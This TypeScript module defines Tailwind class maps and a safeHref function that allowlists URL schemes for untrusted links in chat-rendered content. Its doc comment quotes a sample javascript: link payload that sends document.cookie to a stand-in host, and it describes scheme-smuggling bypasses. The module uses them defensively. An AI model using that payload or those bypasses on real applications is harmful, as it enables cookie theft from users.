export const GAP_CLASS = {
  xs: 'gap-1',
  sm: 'gap-2',
  md: 'gap-3',
  lg: 'gap-5',
  xl: 'gap-8'
} as const;

export const ALIGN_CLASS = {
  start: 'items-start',
  center: 'items-center',
  end: 'items-end',
  stretch: 'items-stretch'
} as const;

export const JUSTIFY_CLASS = {
  start: 'justify-start',
  center: 'justify-center',
  end: 'justify-end',
  between: 'justify-between',
  around: 'justify-around'
} as const;

export function cx(...parts: Array<string | false | null | undefined>): string {
  return parts.filter(Boolean).join(' ');
}

// Navigational URL schemes a link is allowed to point at. Everything
// else — `javascript:`, `data:`, `vbscript:`, `file:`, custom app
// schemes — collapses to a no-op `#`.
const SAFE_URL_SCHEMES = new Set(['http', 'https', 'mailto', 'tel', 'sms', 'ftp', 'ftps']);

/**
 * safeHref — render-time URL scheme allowlist for links sourced from
 * untrusted runtime content (markdown chat responses, LLM output, user
 * text). Pure + dependency-free so it bundles into every generated PWA.
 *
 * Without it, a chat message like
 *   `[tap me](javascript:fetch('//evil',{body:document.cookie}))`
 * renders a one-click XSS sink: Preact attaches the href verbatim and a
 * single tap exfiltrates cookies/storage in the app's own origin.
 *
 * Defenses, mirroring how browsers actually parse URLs:
 *   - Tab/LF/CR are stripped *before* scheme parsing (browsers do this),
 *     so `ja&#9;vascript:` / "java\nscript:" can't smuggle a scheme past
 *     the check.
 *   - Leading C0 control chars + whitespace are trimmed (also browser
 *     behaviour, the classic " javascript:" bypass).
 *   - A scheme exists only when a ':' follows valid scheme chars before
 *     any '/', '?', or '#'. No scheme ⇒ relative / protocol-relative /
 *     fragment ⇒ always safe to navigate to.
 *   - HTML entity tricks (`&#106;avascript:`) are NOT a concern here: the
 *     value is a JS string set via Preact's property/attribute path, not
 *     parsed as HTML, so entities never decode into an executable scheme.
 *
 * Returns a safe href string ('#' for anything disallowed or empty).
 */
export function safeHref(raw: string | null | undefined): string {
  if (!raw) return '#';
  const cleaned = raw
    .replace(/[\t\n\r]/g, '')
    .replace(/^[\x00-\x20]+/, '')
    .trim();
  if (!cleaned) return '#';
  const schemeMatch = cleaned.match(/^([a-zA-Z][a-zA-Z0-9+.-]*):/);
  if (!schemeMatch) return cleaned; // relative / protocol-relative / fragment
  return SAFE_URL_SCHEMES.has((schemeMatch[1] ?? '').toLowerCase()) ? cleaned : '#';
}
